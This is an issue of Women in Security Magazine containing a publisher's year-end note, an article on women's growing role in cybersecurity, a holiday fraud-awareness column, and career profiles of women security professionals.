Women in Security Magazine Issue 23



THE RISE OF WOMEN IN CYBERSECURITY: A RESURGENCE

POWERING CHANGE AND INNOVATION

THE PHOENIX EFFECT: WOMEN RESKILLING AND PIVOTING INTO CYBERSECURITY

FROM THE PUBLISHER

End-of-year publisher’s note

As 2024 draws to a close it’s the perfect time to reflect on an incredible year of growth, resilience and celebration within Women in Security. Throughout the past year we’ve tackled pressing questions, explored bold themes and highlighted the exceptional work being done by women across the cybersecurity landscape. This has been a year of navigating challenges and championing resilience, and I’m incredibly proud of what we’ve accomplished together as a community.

Our journey this year began with a look at Who Should Be in Security, a theme that invited discussions about the future of the industry’s workforce. We explored the importance of diversity, not just in gender but in background, experience and perspective, building a foundation of inclusivity that empowers everyone in the industry to contribute and thrive.

Next, we turned to The Future is Now, a theme focused on the cutting-edge advancements women are driving in technology and cybersecurity. With inspiring stories of leaders and innovators we highlighted how women are not only shaping the future but actively defining it in real-time. We dived into the transformative technologies being developed by women and examined how these advancements will set the course for the industry’s evolution in the coming decades.

In Guardians of Tomorrow we celebrated the powerful roles women play in safeguarding organisations, communities and critical infrastructure. This theme was a testament to the expertise and commitment women bring to cybersecurity. From protecting sensitive data to defending against cyber threats, women across the globe are making significant contributions to security with a shared dedication to protecting the systems and people who depend on them.

Mid-year, we took on Rising Phoenix: A Tale of Resilience and Renewal, where we explored stories of triumph over adversity. This theme resonated deeply with our community, because it showcased women who have faced challenges head-on and emerged stronger. We featured leaders and change-makers who have shown us that resilience is more than just bouncing back; it’s rising above, transforming setbacks into stepping stones and inspiring others to do the same.

And, as we close out 2024, we’re concluding with Resurgence: Our Triumphant Ascent, celebrating the renewed strength and growth of women in security. This theme captures the spirit of a community that, despite the hurdles, continues to ascend with courage, determination and an unshakable commitment to progress. Resurgence honours the strides we’ve made together, showcasing the women who are leading the way in every corner of the cybersecurity industry.

I want to extend a heartfelt thank you to everyone who made this year’s Australian Women in Security Awards an unforgettable success. To our judges, nominators, nominees, finalists and generous sponsors: your support and commitment are the pillars of these awards. Every nomination and recognition adds to the momentum we’re building toward a stronger, more inclusive industry. These awards aren’t just a celebration of individual achievements, they’re a testament to the incredible impact women have across the sector and to the positive change we can drive together.

Looking ahead to 2025, I am beyond excited to announce the return of the New Zealand Women in Security Awards, a chance to once again spotlight the talent and dedication of women in our sister country. We’re also expanding into new territories, with the first-ever Women in Security Awards launching in Tasmania and Hong Kong. This expansion reflects a vibrant, growing community that believes in the power of representation and recognition, and we’re honoured to support and celebrate even more women in these regions. So, stay tuned, there’s so much on the horizon!

Finally, thank you to all our readers, contributors and supporters. It’s your energy, dedication and enthusiasm that make Women in Security what it is. Your involvement, whether as a participant, advocate or ally, strengthens this community and drives us forward. It’s been a challenging year. I won’t lie. I have really struggled, but with each challenge we grow stronger and more united.

Here’s to a bright 2025, filled with new possibilities, expanded horizons and even greater achievements. Together, let’s continue to push boundaries, break barriers and build a security industry where everyone’s contributions are valued.

Thank you for being part of this journey, and here’s to coming back stronger than ever in the year ahead.

www.linkedin.com/in/abigail-swabey-95145312

aby@source2create.com.au

Abigail


THE RISE OF WOMEN IN CYBERSECURITY: A RESURGENCE POWERING CHANGE AND INNOVATION

For years, cybersecurity has faced a striking gender imbalance, with women historically making up only a small fraction of the workforce. However, recent years have seen an inspiring resurgence of women in cybersecurity—a shift that is reshaping the industry and bringing vital diversity to the fight against cyber threats.

BREAKING BARRIERS THROUGH EDUCATION AND MENTORSHIP

The increase in women entering cybersecurity has been driven by educational pathways, mentorship, and supportive organisations committed to advancing diversity. Programs like the New Zealand Network for Women in Security (NZNWS), WiCyS, WISECRA and the Australian Women in Security Network (AWSN) are helping women launch and grow their careers through mentorship, networking opportunities, and skills development. AWSN, for instance, has facilitated training and workshops, providing women with hands-on experience to succeed in technical and leadership roles. Similarly, Girls Who Code and CyberFirst are initiatives that introduce young women to tech and cybersecurity early, addressing the gender gap at its roots.

Universities and certification programs are also fostering inclusivity by offering tailored scholarships and learning paths. For example, the SANS Institute, one of the top cybersecurity training organisations, has collaborated with the Women’s Society of Cyberjutsu to offer scholarships and specialised courses for women in cybersecurity. Their partnership provides a structured pathway into the industry, making it easier for women to acquire the critical technical skills and confidence needed to excel.

WOMEN LEADING CHANGE ACROSS CYBERSECURITY

The effects of this resurgence are evident in both public and private sectors, where women are taking on increasingly influential roles. Take Shamane Tan, Chief Growth Officer at Sekuro, for instance. Shamane has not only achieved a leadership position in cybersecurity but has also become a vocal advocate for diversity and inclusion in the industry. Her role involves developing strategic cybersecurity solutions while fostering a culture that encourages gender diversity. This has not only advanced her organisation but has also positioned her as a role model for women in the sector.

In government roles, the U.S. Department of Homeland Security (DHS) has made notable strides, appointing Jen Easterly as the Director of the Cybersecurity and Infrastructure Security Agency (CISA). Her leadership has brought a fresh perspective to national cybersecurity, underscoring the importance of inclusivity, resilience, and proactive defence strategies. Easterly’s focus on collaboration and community-building within CISA has inspired young women to envision careers in cybersecurity and to see themselves as future leaders.

A MEASURABLE IMPACT ON THE INDUSTRY’S FUTURE

As more women enter cybersecurity, their impact is being felt across the industry. A report by (ISC)², an international cybersecurity certification organisation, showed that while women still represent only 24% of the cybersecurity workforce globally, their influence is growing, particularly in roles that emphasise governance, risk management, and education. For instance, Paula Januszkiewicz, CEO of CQURE and a well-known cybersecurity expert, has been instrumental in delivering cybersecurity training around the world. Through her work, she demonstrates how women’s expertise in cyber is changing the industry and raising the bar on cybersecurity practices.

Women in cybersecurity are often driven by a collaborative approach that leads to innovative solutions. They have been key to enhancing threat detection and response protocols by fostering teamwork, empathy, and fresh thinking. Organisations that prioritise gender diversity in security teams often report higher performance, reduced risk, and enhanced creative problem-solving abilities. Research has shown that diverse teams can identify security vulnerabilities more effectively because they approach problems from various perspectives.

ENCOURAGING THE NEXT GENERATION

The surge in women entering cybersecurity is also helping inspire the next generation. Programs like CyberGirls in Nigeria offer training and mentorship

This initiative, focused on helping underrepresented communities, is making an impact on the global cybersecurity landscape. Likewise, Australia’s SheLeadsTech program, under the ISACA Melbourne Chapter, provides young women with networking, mentorship, and leadership opportunities, ensuring they have a clear path to a career in cyber.

As women continue to break new ground, they’re creating a cybersecurity industry that’s more resilient, adaptable, and ready for the challenges of a digital future. The resurgence of women in cybersecurity is not only correcting historical imbalances but also laying the groundwork for a more diverse and effective cybersecurity workforce, capable of defending against the complex cyber threats of today and tomorrow.


A NEW ERA IN CYBERSECURITY

This resurgence marks a pivotal cultural shift, where diversity and inclusion are increasingly seen as essential strengths in combating cyber threats. As more women enter and thrive in cybersecurity, their collective contributions are shaping a new era of enhanced security through a blend of talent, innovation, and teamwork. The growing presence of women in cybersecurity isn’t just a welcome change—it’s a transformative force, with countless examples demonstrating that diversity is not merely an asset but a critical necessity. According to Cybersecurity Ventures, women are expected to hold 30 percent of cybersecurity jobs globally by 2025, with projections reaching 35 percent by 2031, underscoring the industry’s commitment to a more inclusive future.

If you're part of an organisation dedicated to promoting diversity and inclusion, we'd love to discuss our 2025 Awards packages with you.

These packages are designed to further our shared mission of recruiting, retaining, and advancing women in the cybersecurity workforce.

By becoming a sponsor and supporting our event, you'll visibly demonstrate your commitment to celebrating diversity and recognising accomplishments within the security industry.

AMANDA-JANE TURNER

Cybercrime is big business, thanks to technical advancement and interconnectivity creating more opportunities. This regular column will explore various aspects of cybercrime in an easy-to-understand manner to help everyone become more cyber safe.

COLUMN

Renew your vigilance against cyber enabled fraud

As the year ends and people settle in for holidays and parties, make gift purchases, book holidays, give to charitable holiday appeals and start to wind down, criminals are ready to pounce.

Criminals are known to exploit events, major holidays, charitable causes and brand names as bait in fraud attempts. These scams may be cyber-enabled or in person, but either way they are exploiting generosity, holiday times and emotive themes to trick people into gifting or paying money for a cause, paying for items that don’t exist, downloading malware from links in spoofed brand name emails, or providing personal identifying information that could be used for identity theft.

The availability, affordability and advances in online technology make it easier for criminals to create lookalike web domains, believable social media pages and posts, emails and texts, or faked charity ID cards. It can be increasingly challenging to determine if requests for donations, shopping discounts or cheap holiday destination tickets or events are genuine.

Criminals exploit year end, when people may be expecting to receive items as a result of their online holiday shopping, or are sending or receiving gifts via the mail. These fraudsters send text messages and emails, or phone people, pretending they are from a postal service or a country’s customs agency to give their claims believability. They may say a parcel has been delayed due to insufficient postage so the receiver needs to make a payment, or that the parcel has been held up at Customs, so they require more information from the addressee (bank details, name, address, date of birth, driver’s license details, or other government identifiers).

If in doubt about a message, independently locate the contact details for the postal, shipping, shop or customs service yourself and contact them directly to ask if the message came from them.

Be vigilant with emails or texts asking you to verify your PayID, PayPal or credit card details, and take care if a seller requests additional funds or an additional fee above the selling and posting costs for the ‘transaction’. Remember that criminals can make the caller ID appear to be from a known brand, and that, thanks to advances in AI, they can use deep fakes to appear as someone else, or structure their message content to be more believable.

If you are asked to donate to or buy merchandise from a charity organisation, verify its legitimacy first. You can do this by checking the charity in online government charity registers. Then send your donation or buy your merchandise through the charity’s verified online or physical shopfronts, or in a setting where you can view and verify the legitimacy of a charity collector’s ID.

If you, or someone you know, is ever tricked by criminals, remember there is no shame in that; anyone can be a victim of crime. The only ones who should bear the shame are the criminals.

Resolve to renew your vigilance against fraud whether in person or online. Stay safe everyone.

www.linkedin.com/in/amandajane1

www.empressbat.com

WHAT’S HER JOURNEY?

Jahnavi Gurrappadia

Cyber Security Test Analyst at Insurance Australia Group (IAG)

“I didn’t have a fully defined vision of the roles I aspired to when I started,” Jahnavi Gurrappadia reflects on her beginnings in cybersecurity.

“My path unfolded organically, shaped by the experiences and opportunities that came my way.” Today, Jahnavi is a dedicated cybersecurity analyst, a role that represents not just a profession but a passion that has evolved through curiosity, resilience, and relentless learning.

Her journey into the field began with a simple curiosity about protecting information and the dangers of cyberattacks. “I had little to no knowledge about cybersecurity when I started,” she admits. “I knew I wanted to pursue it as a career, but I didn’t know where to begin.” With determination, she immersed herself in the basics, gradually building a solid technical foundation through certifications like the Google Cybersecurity Professional Certificate, the EC-Council’s SOC Analyst Certification, and OKTA Certified Professional.

For Jahnavi, hands-on learning has been pivotal. During her SOC Analyst certification course, she delved into tools like Splunk for Security Information and Event Management (SIEM), which enabled her to understand logs and promptly analyse attacks. “Practice became a daily routine for me,” she says. This approach not only helped her overcome the steep learning curve but also ignited a deeper interest in understanding and addressing cyber threats.

Navigating her early career wasn’t without challenges. “Staying ahead of the ever-evolving threat landscape is one of the most complex aspects of this field,” she explains. Yet, she’s found ways to thrive amidst the dynamic demands. Attending industry conferences, collaborating within the cybersecurity community, and leveraging advanced tools like AI and machine learning have all played a role in her ability to stay adaptable. “Engaging with peers and experts gives me diverse perspectives and invaluable insights,” she shares.

Her journey hasn’t been devoid of doubts. “There were moments when the complexity of the field felt overwhelming,” she acknowledges. During one particularly trying time, Jahnavi sought guidance from mentors in the cybersecurity community. Their encouragement reminded her to view obstacles as opportunities for growth. “Each challenge has ultimately strengthened my resolve,” she adds, a testament to her resilience and growth mindset.

Jahnavi’s passion for cybersecurity extends beyond technical skills; she places great value on interpersonal communication. “We have to make people with little to no cybersecurity background—like CEOs or managers—understand why it’s essential to invest in security measures,” she explains.

This ability to bridge technical knowledge and layman’s understanding is a cornerstone of her approach, and one she believes is crucial for any cybersecurity professional.

Reflecting on her early decisions, Jahnavi advises her younger self—and those considering a similar path—to embrace lifelong learning, build a strong technical foundation, and engage with the cybersecurity community. “Above all, cultivate a genuine passion for security,” she emphasises. “This field requires dedication and a relentless pursuit of knowledge. Your passion will drive you to overcome challenges and continuously strive for excellence.”

From her first tentative steps into the unknown to becoming a cybersecurity professional with clear goals and a proactive approach, Jahnavi’s journey is a story of perseverance and discovery. “If you love what you do, the learning never stops,” she says with a smile. And for Jahnavi, the journey is just beginning.

Jahnavi Gurrappadia admits about her entry into the cybersecurity world. “My path has unfolded organically, guided by curiosity and opportunities.” From those initial uncertain steps to a burgeoning career in cybersecurity, Jahnavi’s journey is one of tenacity, growth, and continuous learning.

She believes the foundation for aspiring professionals lies in understanding the fundamentals: “Network security, secure coding practices, and the ethics of cybersecurity are non-negotiable,” she says. Staying ahead in a fast-evolving field has meant embracing the opportunities presented by certifications, workshops, and emerging technologies. “The Certified Threat Intelligence Analyst (CTIA) and Certified Ethical Hacker (CEH) are next on my list,” she shares, underscoring her commitment to lifelong learning.

For Jahnavi, staying current is both a necessity and a passion. She views advancements in artificial intelligence, machine learning, and cloud security as pivotal to the future. “AI and ML are transforming the way we detect and respond to threats,” she notes, emphasising the dual role these technologies play in both defending against and enabling attacks.


Navigating her career hasn’t been without its challenges. From addressing the vulnerabilities of IoT devices to managing the growing complexities of cloud infrastructure, each hurdle has reinforced her resolve. “The human element is always a critical factor,” she observes, noting the importance of fostering a security-conscious culture to counter threats like phishing and social engineering.

Mentorship has played a crucial role in her journey. “Having a mentor, Mark (Mitch) Stephenson, who emphasised ethics and integrity shaped my approach to cybersecurity,” she reflects. These values, coupled with her technical expertise, guide her as she tackles complex security challenges and explores career advancements. Beyond salary, Jahnavi evaluates the culture, professional development opportunities, and work-life balance offered by potential roles. “Burnout is a real concern in our field,” she says, stressing the importance of finding an organisation that aligns with her values and goals.

Looking to the future, Jahnavi remains optimistic about the ever-changing cybersecurity landscape. She views each development—be it 5G networks or enhanced data privacy regulations—as an opportunity to adapt and innovate. “This is a field where you never stop learning,” she says, “and that’s what makes it so exciting.”

Jahnavi’s story is a testament to the power of perseverance and adaptability. With a strong foundation, a clear sense of purpose, and an unrelenting passion for cybersecurity, she is carving out her place in a dynamic and vital industry. “At the heart of it all,” she concludes, “is a commitment to protect and secure the digital world we all rely on.”

For Jahnavi Gurrappadia, cybersecurity is more than a profession—it’s a passion driven by purpose. As she reflects on her role, it’s clear that her commitment to the field extends beyond technical expertise to fostering community and collaboration. “Mentoring aspiring professionals brings me immense fulfilment,” she shares. “Watching my mentees overcome challenges and grow into their potential is one of the most rewarding aspects of my work.”

Jahnavi’s days are filled with diverse responsibilities, from analysing system logs and implementing security patches to participating in strategy meetings with senior management. Each task is approached with precision, a testament to her dedication to safeguarding information systems. “The integration of security into every workflow is essential,” she says. “Collaboration across departments ensures that risks are mitigated at every level.”

To stay ahead in a field defined by rapid technological evolution, Jahnavi employs a proactive approach to learning. Whether diving into industry webinars or leveraging tools like SIEM systems, she continuously hones her skills. “The real-time insights these tools provide are invaluable,” she notes, emphasising their role in swift threat detection and mitigation.

Balancing a demanding career with personal wellbeing is no small feat, yet Jahnavi has mastered the art of equilibrium. “Time management, mindfulness practices, and creative pursuits like singing keep me grounded,” she says. “Connecting with loved ones and allowing myself the space to rest are just as important as meeting professional deadlines.”

Beyond the technicalities, Jahnavi finds inspiration in her professional affiliations with organisations like ISC² and the Cyber Threat Alliance. These memberships offer a platform to exchange ideas and stay attuned to global trends, enhancing both her expertise and her network. “Belonging to these organisations keeps me at the forefront of industry developments while fostering meaningful connections,” she explains.

Looking ahead, Jahnavi envisions a cybersecurity landscape shaped by artificial intelligence, cloud migration, and evolving regulations. She is eager to tackle the challenges posed by these advancements, all while championing ethical practices and mentorship. “At the heart of cybersecurity lies a responsibility to protect,” she reflects. “For me, that’s not just about securing systems but also about empowering people.”

Jahnavi’s journey is a story of resilience, growth, and a relentless pursuit of excellence. With a focus on community, innovation, and balance, she continues to leave an indelible mark on the field of cybersecurity.

The cybersecurity skills gap is a challenge felt deeply by organisations worldwide, and Jahnavi’s team is no exception. The ever-evolving nature of cyber threats, coupled with the growing complexity of digital infrastructures, has amplified the need for skilled professionals. “The shortage of talent has created a fiercely competitive market,” she observes. “Recruiting and retaining top cybersecurity talent often requires innovative approaches.”

Some roles have proven particularly elusive to fill. “Security Operations Center (SOC) analysts, threat intelligence analysts and Identity Access Management (IDAM) analysts are among the most challenging to recruit,” Jahnavi notes. These roles demand not only technical expertise but also advanced analytical skills and a deep understanding of threat landscapes. “It’s not just about finding someone with the right skills—it’s about finding someone with the resilience and agility to adapt to a fast-paced, high-stakes environment.”

Despite these hurdles, Jahnavi’s organisation has adopted a proactive strategy. “We focus on creating an environment that fosters continuous learning, professional growth, and balance,” she explains. By investing in training programs and nurturing new talent, they’ve cultivated a sustainable pipeline of skilled professionals while retaining their existing workforce.

Jahnavi also offers thoughtful advice for those looking to transition into cybersecurity from other fields. “Your existing skills can be a tremendous asset,” she emphasises. “Whether it’s analytical thinking, problem-solving, or expertise in related domains, these strengths can serve as a foundation for success in cybersecurity.”

She highlights the importance of practical experience, encouraging newcomers to engage in projects, simulations, and certifications to build confidence and competence. “Continuous learning is non-negotiable,” she adds. “Staying updated on trends and immersing yourself in the community are key to thriving in this field.”

Jahnavi’s insights underscore her commitment to not only advancing her own career but also shaping the future of the cybersecurity profession. Her ability to navigate challenges, mentor others, and adapt to change exemplifies the resilience and ingenuity required to thrive in a critical and dynamic industry.

www.linkedin.com/in/jahnavi-gurrappadia-834873152

Favour Ugwoke

For Favour Ugwoke, cybersecurity is more than a career—it’s a deeply personal mission. Her journey began with a painful incident when her mother fell victim to a social engineering and phishing scam, losing her life savings. “I saw the pain it caused her,” Favour reflects. “I told myself, ‘No one should have to go through this.’ I wanted to protect people from such experiences.” When the opportunity to learn about cybersecurity came along, she embraced it wholeheartedly.

Starting out, Favour didn’t have a clear path in mind. “I knew I wanted to protect people, but I didn’t understand the roles or where I fit in,” she admits. Coming from a non-technical background, she felt lost at first. That changed when she joined the CyberSafe Foundation’s CyberGirls program, an initiative aimed at training African women in cybersecurity. “The program introduced me to so many professionals who shared their career paths. That insight helped me figure out what I wanted to do. I began with penetration testing and eventually transitioned into working in a Security Operations Center (SOC).”

Today, as a SOC Analyst with skills in both offensive and defensive security, Favour finds fulfillment in her work. “Protecting organizations from cybercriminals is exactly what I’ve always wanted to do. Knowing I’m making a tangible impact in the industry is incredibly rewarding.”

In an industry that evolves constantly, staying current is a challenge Favour meets head-on. She keeps up with developments through cybersecurity blogs, forums, and online courses. Platforms like TryHackMe and Let’s Defend have been instrumental in sharpening her technical skills. She’s also an active participant in online communities, using spaces like LinkedIn and Discord to connect with peers, exchange ideas, and stay informed.

Looking back, Favour has advice for her younger self: “Start earlier. Cybersecurity isn’t easy, but it’s worth it. Learn the basics, play with tools like Linux and Python, and be curious about how systems work. It might seem overwhelming at first, but every little step adds up.”

When she looks to the future, Favour sees significant challenges on the horizon. “AI-powered attacks are going to be a major problem,” she notes, pointing to sophisticated phishing, deepfakes, and adaptive malware. She’s also concerned about ransomware’s growing complexity, particularly double and triple extortion tactics. “Organizations need to adopt zero-trust security models, invest in AI defenses, and build a strong culture of cybersecurity awareness. The threats are real, but with the right strategies, we can stay ahead.”

Balancing the demands of cybersecurity with her personal life is important to Favour. “Workdays are for work. I stay focused and avoid distractions. When I’m off, I make time for other interests like modeling or simply relaxing with a movie. It’s all about finding balance and knowing when to take a step back.”

Throughout her journey, mentorship and representation have played a crucial role. “Women like Confidence Staveley have been a huge inspiration to me. Seeing her break stereotypes taught me that my dreams are valid. Her example motivates me to keep pushing forward.” Favour credits her growth to a mindset of continuous learning, a principle she considers non-negotiable in the cybersecurity field.

For those considering a transition into cybersecurity, Favour offers a clear message: “Be curious, stay determined, and don’t be afraid to start from scratch. With focus and persistence, you can make a difference. The world needs more people committed to keeping our digital spaces safe.”

Favour’s journey, shaped by personal loss and a relentless drive to protect others, is a powerful reminder of what can be achieved with purpose and determination. Her story continues to inspire, not just as a cybersecurity professional, but as a defender of the digital world.

www.linkedin.com/in/favour-ugwoke/

STSM and Senior Manager, IBM / Adjunct Faculty, UMGC at Maryland

Nikki Robinson’s career in cybersecurity began with a spark that ignited during her time in IT forensics. The investigative nature of the work, paired with the deep technical understanding it required, drew her in immediately. “Being part of an investigation was fascinating,” she shares. “But when I discovered vulnerability chaining, I knew cybersecurity was where I belonged.” This realization didn’t just guide her career—it inspired her to pursue advanced degrees, including a Doctorate of Science in Cybersecurity and a PhD in Human Factors, merging the technical and human aspects of the field.

Her journey has been defined by a blend of curiosity, determination, and an unwavering commitment to growth. Early in her career, Nikki credits her time on the Helpdesk for laying the groundwork. “It was there that I developed my love of troubleshooting and problem-solving,” she explains. “That curiosity, paired with my passion for research, has been a driving force throughout my career.”

The ever-evolving nature of cybersecurity presents constant challenges, but for Nikki, that’s part of the appeal. “The scope of what I need to understand—from infrastructure to cloud and AI—is massive, and technology is always changing,” she says. “But that’s what I love most. It keeps me learning and ensures my work is never repetitive.”

However, her path hasn’t been without its hurdles. Like many in the industry, Nikki has faced moments of self-doubt. “Imposter syndrome is something I still deal with,” she admits. “When I published my first book, I questioned whether I was the right person to do it. But I’ve learned that pushing through those doubts leads to the greatest growth.”

In the early days of her career, Nikki had a clear vision of where she wanted to go. “I started in IT operations with the goal of becoming a security engineer,” she says. That focus guided her to a security engineering role and later to a position at IBM, where she transitioned into security architecture. Over time, her perspective shifted. “Now, I worry less about the title and more about the mission behind the role. It’s about finding work that’s meaningful and impactful.”

Reflecting on her journey, Nikki often thinks about the advice she’d give her younger self. “Trust your instincts,” she says. “When I decided to pursue an online degree instead of staying at a traditional university, I faced so much criticism. But I knew it was the right path for me, and it’s what set me up for the success I have today. Stick to your decisions, work hard, and don’t let anyone tell you what you can’t do.”

Nikki also encourages aspiring cybersecurity professionals to consider the value of technical experience. “A strong technical foundation can be incredibly helpful,” she says. “If you’re struggling to land a cybersecurity role right away, look into systems engineering, development, or cloud roles. They’ll give you valuable skills and perspectives that you can carry into a cybersecurity career.”

Looking to the future, Nikki sees significant challenges ahead for the field, particularly with the rise of AI-driven threats and the increasing sophistication of attack methods. Her passion for vulnerability chaining has shaped her ability to tackle these challenges, informing her research, writing, and problem-solving approaches.

Maintaining balance in such a demanding field can be difficult, but Nikki has found a system that works for her. “Each year, I set a personal goal outside of work—something physical and outdoors, like triathlons or horseback riding,” she says. “It helps me reset mentally and physically, keeping me grounded and ready to take on the demands of my career.”

Nikki Robinson’s story is one of curiosity, perseverance, and purpose. From her early days on the Helpdesk to her role as a leader in cybersecurity, she has shown that success in the field is built on continuous learning, trusting your instincts, and staying focused on what truly matters.

www.linkedin.com/in/dr-nikki-robinson

Dorota Kozlowska

Penetration Testing and Social Engineering Specialist | Security Analyst at Black Hills Information Security

Dorota Kozlowska’s pathway in cyber security began with a spark of curiosity inspired by pop culture and her fascination with the digital world. As a natural problem-solver, she found herself drawn to the thrill of outsmarting complex systems, a passion she first encountered in her government role. Over time, this curiosity evolved into a commitment to protecting against real-world threats and led her to carve out a path in offensive security. “I’ve always been captivated by the idea of unravelling mysteries,” she says. “That passion became the foundation of my career in cybersecurity.”

Taking the leap from a secure government role to the challenging world of penetration testing wasn’t easy, but it was pivotal. Dorota began attending cybersecurity meetups, building her network, and immersing herself in the field. She invested in certifications, extensive training, and countless hours practising penetration testing techniques. “It was a calculated risk, but it was necessary,” she recalls. “The commitment to constant growth and taking those leaps of faith shaped my professional path.”

For Dorota, staying ahead in the ever-changing cybersecurity landscape is both the most exciting and challenging aspect of her role. She keeps herself sharp through advanced training, hands-on projects, and active engagement with the cybersecurity community. Her philosophy is simple: “You have to embrace being a lifelong learner,” she explains. Every day is an opportunity to grow, a sentiment she captures in her favourite hashtags: #NeverGiveUp and #LearningEveryDay.

Resilience has been a recurring theme in Dorota’s life, extending far beyond her career. Surviving cancer not only transformed her perspective but also reinforced her determination. “It taught me to stop procrastinating and live fully in the moment,” she says. “There’s no challenge I’m afraid of anymore. I’ve realised I am the architect of my own life, and I want to create something beautiful.”

Although her initial foray into cybersecurity was organic, she eventually found her calling in offensive security. “Once I discovered the impact of this work, I set my sights on becoming a Penetration Tester,” she shares. “Since then, my focus has been mastering my craft and growing into a seasoned Red Teaming Specialist.”

Her advice to aspiring cybersecurity professionals is grounded in her own experiences. “Believe in yourself, embrace curiosity, and don’t settle for less than what you deserve,” she emphasises. “It’s okay to change paths if something doesn’t feel right—life is too short to stay in the wrong place.” For those starting out, she highlights the importance of foundational knowledge in computer science, networking, and programming, alongside practical experience through internships, labs, or competitions.

Looking ahead, Dorota sees AI-driven security tools and zero-trust architectures reshaping cybersecurity. However, she also warns of the growing sophistication of threats, including ransomware-as-a-service and AI-enhanced cyberattacks. “We need to stay vigilant and anticipate these evolving tactics,” she says.

Dorota finds deep satisfaction in uncovering vulnerabilities and knowing her work makes systems safer. “It’s incredibly rewarding to know that what I do helps protect others from potential harm,” she reflects. She balances the demands of her role by dedicating time to her passions, including cycling, playing the electric guitar, and practising Kyudo, the Japanese art of archery. “Kyudo helps me find my centre and teaches patience,” she says, adding with a smile that she’s also recently taken up snowboarding and hockey-style ice skating. “You’re never too old to try something new.”

In her daily work, Dorota relies on tools like Kali Linux, Burp Suite, and Metasploit to identify vulnerabilities and prioritise risks. Beyond her technical expertise, she values the community aspect of cybersecurity. As a member of CEFCYS and other professional forums, she benefits from mentorship, networking, and the exchange of ideas.

Her story is a testament to the power of perseverance and adaptability. For those transitioning into cybersecurity, she offers a reminder: “Embrace the learning curve and stay curious. Start small and seek out opportunities to practise. Cybersecurity rewards those who push through challenges and think critically.”

Through her resilience, dedication, and passion for innovation, Dorota Kozlowska has not only built an inspiring career but also created a legacy of breaking barriers in cybersecurity. Her journey is a powerful reminder that with courage and curiosity, the possibilities are endless.

www.linkedin.com/in/dorota-kozlowska

twitch.tv/wwdhacks

x.com/WWD_Hacks

youtube.com/@wwdhacks

Ramona Ratiu

MS, CISM, CISA, GCCC, GSTRT | Cyber Security | Adjunct Professor | Board Strategic Advisor | Mentor | SheLeadsTech Ambassador

For Ramona Ratiu, Head of Cyber Resilience Testing Program at Zurich Insurance, cybersecurity wasn’t a predetermined path, but rather one that gradually emerged as she navigated her academic and professional journey. “Cybersecurity wasn’t a path I planned, but one that found me as I navigated the rapidly evolving digital landscape,” she shares. Her academic beginnings were rooted in a Bachelor’s degree in Finance from Babes Bolyai University in Romania, where she developed strong analytical skills. However, it was during her Master’s in Information Systems at DePaul University in Chicago that the spark for cybersecurity was ignited. Initially focused on Business Intelligence and Analytics Systems, it wasn’t until a professor discussed the intersections of technology, risk, and compliance that Ramona’s curiosity deepened.

“It was my first glimpse into the broader implications of cybersecurity—not just as a technical challenge but as a critical enabler of trust in a digital world,” Ramona reflects. She began to see cybersecurity not merely as a reactive measure, but as a proactive force that could anticipate threats, foster resilience, and support innovation.

Her early career in Security Governance, Risk, and Compliance revealed the nuances of the cybersecurity field, where she discovered how crucial the synergy of people, processes, and technology is to defending against threats. “Cybersecurity is less about barriers and more about bridges—bridging knowledge gaps, uniting teams, and connecting resilience to business objectives,” she explains. This realization fueled her passion to delve deeper into the strategies of attackers and understand how to empower organizations to become more proactive in their defense mechanisms. Her work in creating cyber attack simulations became a defining aspect of her approach—thinking like an adversary while helping organizations build agility and resilience.

Despite the challenges of a rapidly changing landscape, Ramona’s journey has been one of continual evolution and excitement. “Cybersecurity isn’t just a career; it’s a mission,” she says. “The relentless pace of change fuels my drive to stay ahead, find creative solutions, and ensure that businesses and individuals alike can thrive securely in an increasingly digital world.”

When reflecting on the early stages of her career, Ramona notes that she didn’t have a clear roadmap for her journey. “My path unfolded organically, shaped by curiosity, opportunities, and an eagerness to explore the unknown,” she shares. This flexibility allowed her to remain adaptable, open to emerging trends, and ready to seize opportunities as they arose.

“Not having a rigid roadmap allowed me to explore, grow, and discover paths I hadn’t even imagined,” she says, acknowledging that curiosity and creativity guided her toward cybersecurity.

As for advice to her high school self, Ramona advocates for a focus on curiosity and ethics in the digital world. “Cybersecurity isn’t just about technology; it’s about understanding the impact of your decisions in a world where a single digital mistake—a post, a comment, an image—can last forever,” she emphasizes. Critical thinking, she believes, is the greatest ally for aspiring cybersecurity professionals. She advises young students to embrace the unknown, develop analytical skills, and stay adaptable to changing opportunities, as it was these traits that ultimately shaped her career.

Looking ahead, Ramona predicts that technology will continue to shape the future of cybersecurity. “The integration of artificial intelligence and emerging technologies like quantum computing will revolutionize cybersecurity, enabling predictive threat detection and advanced defenses,” she notes. However, she also cautions that these developments must be approached responsibly to prevent misuse and bias. Beyond technology, she emphasizes the need for a human-centered approach, focusing on empowering individuals through education and digital literacy.

Collaboration will also play a key role in the evolution of cybersecurity, especially in light of increasingly sophisticated cyber threats. “Addressing the complexity of these threats will require unprecedented collaboration among governments, industries, and international organizations,” she explains. Ramona envisions a future where cybersecurity isn’t just about defense, but about fostering trust, innovation, and inclusivity in the digital world. “By embedding ethics, equity, and humanity into our cybersecurity strategies, we can create a digital world that’s not only safer but also fairer and more inclusive for all.”

As someone who’s actively contributed to the cybersecurity community, Ramona’s involvement in organizations such as ISACA has been invaluable. Her role in the ISACA Chicago Chapter and her leadership of the SheLeadsTech with Expertise program underscore her commitment to elevating women in technology. “ISACA’s global network has provided me with invaluable opportunities to connect with like-minded professionals and leaders, exchange knowledge, and stay at the forefront of emerging trends,” she reflects. She takes pride in her role as a mentor and advocate, and in 2023, was honored with the ISACA Inspirational Leadership Award for her dedication to education, mentorship, and advancing women in tech.

Ramona’s personal journey within cybersecurity highlights the importance of continuous learning, resilience, and collaboration. “Cybersecurity is an ever-changing field, and success demands a willingness to explore, fail, and learn,” she says. She emphasizes the importance of experimentation and curiosity, noting that a diverse background can offer fresh perspectives in tackling cybersecurity challenges. “See your background as an advantage,” she encourages, whether transitioning from finance, healthcare, or any other field. Embracing new ideas and approaches is key to driving innovation in the industry.

Finally, in a demanding field like cybersecurity, maintaining a work-life balance is crucial. Ramona believes in integrating both personal and professional life, prioritizing mental and physical health as part of a holistic approach to success. “Work smart and prioritize what’s important at any given time,” she advises. “Individual fulfillment comes from both professional achievement and personal well-being.”

For Ramona, cybersecurity is more than a career—it’s a mission to protect the trust and security that underpin our digital world. With a deep commitment to resilience, empowerment, and collaboration, she continues to shape the future of the industry, inspiring others to do the same.

www.linkedin.com/in/ramonaratiu


